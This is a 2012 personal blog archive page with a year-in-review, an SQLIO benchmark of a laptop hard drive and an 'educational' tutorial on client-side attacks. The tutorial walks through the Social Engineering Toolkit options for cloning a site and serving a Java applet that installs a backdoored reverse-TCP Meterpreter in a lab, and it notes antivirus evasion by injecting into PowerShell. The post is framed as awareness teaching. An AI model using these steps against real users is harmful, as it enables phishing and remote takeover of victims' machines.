RSS

Monthly Archives: December 2012

My favorite posts from 2012

My all time favorite post happened in 2012: https://nujakcities.wordpress.com/2012/11/25/im-speaking/

This was my first PASS speaking engagement and pretty big milestone for me. Fact is, I really just found a topic that I am truly passionate about. I don’t get to practice hacking at work so it is really a second life for me. If you want to take a journey to the dark side, here are some of my favorite posts on hacking.

There was one other topic I enjoyed writing about, statistics. I imagine this is because one of our main production servers had some issues finding bad query plans because of stale statistics. Whenever I spend that much time at work digging into a problem it gives me a lot to write about.

I took another leap this year and started adding and suggesting indexes. I had always considered this a design issue (ie: not my problem) but sometimes things get pretty bad. I have access to all the tools to sift through an environment of over 100 SQL Servers and find the worst offenders. This year I actually had some success with that process.

 
Leave a comment

Posted by on December 27, 2012 in Uncategorized

 

Don’t click that – Client based attacks with SET

As with all of my other tutorial hacking posts, this one is purely educational. This post is designed to increase awareness of malicious links by showing you exactly how a hacker might execute a browser based attack.

When I explain hacking, I like to divide attacks into two categories. Service based attacks and client based attacks. To figure out what category the attack falls into, answer the question, “Who initiated the malicious chain of events, the good guy or bad guy?” If the bad guy initiated the malicious chain of events, for example, brute force the SQL Server ‘sa’ account, then that is a service based attack. If the good guy initiates the mayhem, for example, clicks a malicious link, then this is a client based attack.

This breakdown of all hacks makes perfect sense to telecom professionals. This is because of firewall rules. A firewall rule requires a direction, in or out. Service based attacks come from outside the network in, and client based attacks come from inside the network going out. Windows firewall by default allows outbound connections, thus we have a problem. Clients are allowed to click whatever filthy, stinking, grimey links they want. Lets get started on how an attacker might set up that trap (pun totally intended).

First, I recommend getting VMware player and downloading backtrack vm. Used the bridged option in vm networking settings for this test. Once logged in, use the menu to navigate to SET – the Social Engineering Toolkit.

set_1

set_2

Once SET is loaded up it’s simply a series of options you need to select to lay the trap. This trap is going to be a web server with a page cloned from a valid website. The page is going to have java code embedded that the user will probably have to approve to run. These are the options I have selected:

1 social engineering attack
2 website attack vector
1 java applet attack method
2 site cloner
no we’re not NAT’n
enter ip of backtrack 10.10.10.107
https://nujakcities.wordpress.com
2 Windows reverse_TCP Meterpreter
16 Backdoored Executable
port:enter for default

wait for “starting payload handler…” which means its ready! :]

Now go to your host machine that probably has java installed and use one of many modern browsers and enter the ip http://10.10.10.107

set_10

You should see all kinds of warnings that Google and Microsoft have put in to protect you. Unfortunately, these are generally ignored. Especially if the attacker has peaked the user’s curiosity. Once you have approved all the warnings, go back to your backtrack vm. You should see some activity and, if you are lucky, an open session.

set_8

What this attack has done is run malicious code, my awesome virus scan picks up on that but before I can click remove, the code has launched powershell.exe and injected itself into that process and fooled the virus scan. At least the pop-up will alert the user bad stuff is about to or has already happened.

set_7

The backdoor makes an outbound HTTPS connection to the attacker’s machine to allow meterpreter to then do it’s dirty work. You can see this connection if you run netstat on the victim

TCP 10.10.10.100:2754 10.10.10.107:https ESTABLISHED

The normal browser context is limited by UAC. If you run the browser as administrator, the malicious code runs as system and can migrate to other, very privileged processes.

set_11

I hope this lesson helps you avoid malicious links. Keep in mind, bad guys can do a lot of bad things to your computer, even take a picture of you. So make sure to smile when clicking sketchy links!

pwn1

 
1 Comment

Posted by on December 22, 2012 in Security

 

Tags: , ,

Hard drive performance in the HP ENVY dv6-7247cl

The Windows Experience Index(WEI) is a tool built into Windows that will test the core components of your computer. I like this tool a lot because it’s easy and takes into account the idea of a bottleneck. Windows 7 had a WEI scale from 1.0-7.9 which didn’t make much sense to me. Windows 8 WEI has a new scale from 1.0-9.9. I’m not sure the thinking here but I hope they eventually update the WEI for Windows 7 to use a 1-10 scale instead of the weird 1-7.9 scale.

My Windows 7 desktop got an outstanding score of 7.1. Even with a solid state drive, the primary hard disk transfer rate was the limiting factor. I was frustrated for years because processors, graphics and memory had made huge performance gains but the old HDD was still slow as molasses. I rejoiced as this issue was address with solid state drives. Even with the roll-out of SSDs, that primary hard disk component is still the bottleneck. Attempts to mask this bottleneck with lots of RAM and more efficient use of storage can only go so far. On my new SSDless HP laptop this bottleneck is noticeable.

5.9... booooo

5.9… booooo

I want to dive a bit deeper into that bottleneck so see how bad it really is. No, we’re not going to be doing this: http://www.youtube.com/watch?v=tDacjrSCeq4 – Shouting at JBODs We’re just going to be runing SQLIO.

It’s difficult to simulate real user activity and get some kind of measurable result that is comparable across systems. I’m going to take an easier route and use a program called SQLIO to let me know how fast my HP ENVY’s HDD really is. WEI thought it was kind of slow (5.9 out of 10) so lets see what SQLIO has to say.

My desktop’s SSD got some excellent marks. These SQLIO parameters test writing small IOs, randomly which is similar to normal user activity.

C:\SQLIO>sqlio -kW -t24 -s20 -o10 -frandom -b4 -BH -LS -F1file1drive1th.txt
IOs/sec: 24349.23
MBs/sec: 95.11

24K+ iops on a test like that is impressive. As a reminder, this hardware got a 7.1 out of 7.9 on WEI.

Now for the feature, the results from my HP ENVY.

C:\SQLIO>sqlio -kW -t24 -s20 -o10 -frandom -b4 -BH -LS -F1file1drive1th.txt
IOs/sec: 1140.55
MBs/sec: 4.45

So for you people who don’t like math, my SSD is ~20X faster than the new HDD in my laptop. My start up time, application load time, context switching(which causes paging) and my virtualization is suffering because of this old fashion technology in my shiny new laptop. After several other tests I was only able to peak at 100MBs/sec with a large sequential style of disk activity that most users just won’t do.

Even thought I have pointed out a very slow component in this laptop I don’t think it should be too concerning. HDDs are still used today because they are more durable and more reliable, not to mention a lot cheaper per GB of storage. The 8GB of RAM does help compensate for this shortcoming.

If you happened to budget $100-$200 more you can still upgrade. Keep an eye on http://www.slickdeals.net. I’ve seen good SSDs near $0.60/GB. I would suggest 120GB or more for a Windows 8 machine. Maybe spend an additional $30 and get an external hard drive enclosure for the old HDD so you can store backups or larger files on it.

The hardware part of the upgrade is easy. First power down the laptop, remove the battery and then press the power button again to deplete any stored power. Be careful when you set the laptop on it’s top because the material is actually plastic and not metal like I had originally thought. With 3 screws you can have the HDD partially removed.

hdd_hp1

Once you get the new drive put in the easy part is over. Now you will have to re-install the OS. HP might be able to send you an operating system install disk but I’m not sure how they are handling that these days. I’m not going to find out because, for now, I’m perfectly happy with the old HDD.

 
Leave a comment

Posted by on December 8, 2012 in Hardware